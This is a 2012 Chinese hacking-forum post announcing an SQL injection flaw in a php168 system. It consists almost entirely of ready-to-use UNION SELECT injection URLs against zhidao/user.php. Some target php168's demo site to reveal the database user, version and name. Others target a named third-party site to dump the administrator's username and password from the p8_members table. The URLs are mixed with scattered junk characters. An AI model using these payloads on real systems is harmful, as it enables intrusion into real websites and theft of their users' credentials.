找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3463|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--: {* W7 _0 n6 K! I
                                                         
( Z2 [+ a) T8 c0 j* K! `                                       3 \7 z! ~+ X% D' A5 j% m( R2 o* b
) b: N& M( E3 N3 u$ H8 K9 ]
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--4 H2 t. l" U! g! ^0 c4 r# q' p
                                                     4 k# ^2 `+ Y# S. F
                                                                  
7 |7 B/ }4 q. v                                                        $ J6 U+ [0 h! s1 V9 ^2 l- w
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
" l+ `; J0 X0 \  u: ?4 c2 Z7 A/ R
) Q% {. o% G  s2 u4 I+ a- X) N- F% j5 K" j: O9 E

4 F/ l" f! f* r& R! u/ i                                                            
, J5 s1 D" A6 h8 C" Q / |& L! ~( ?! R% p# p  I# P1 h- b
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--6 @2 \. L) X  i: l* w4 a% h

1 O& }" c  K3 o) @, Z5 r. A; ^7 B$ ~( O* f- M- k
: a) J  I& v% P, Q' G: M& d( y4 n
                                                                    
0 D- p* G5 }9 B0 V8 b- R

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表